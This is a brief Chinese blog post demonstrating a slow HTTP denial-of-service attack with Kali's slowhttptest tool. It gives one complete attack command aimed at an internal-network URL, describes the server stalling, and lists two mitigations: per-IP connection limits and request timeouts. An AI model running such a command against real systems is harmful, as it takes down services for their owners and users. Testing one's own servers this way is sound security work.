慢速HTTP拒接服务攻击(DoS)复现
kali linux下有个神奇的工具叫“slowhttptest”
命令:slowhttptest -c 1000 -H -g -o slowhttp -i 10 -r 200 -t GET -u http://10.210.6.69:8081/nmc -x 24 -p
在进行慢速DOS攻击期间打开相应页面服务器会响应缓慢或直接无法响应:
修补的方案:
1、限制单机ip的连接数。
2、限制http request header/body 的超时时间
By:珍惜少年时博客:http://www.cnblogs.com/xishaonian/
*-------------------------------------------*
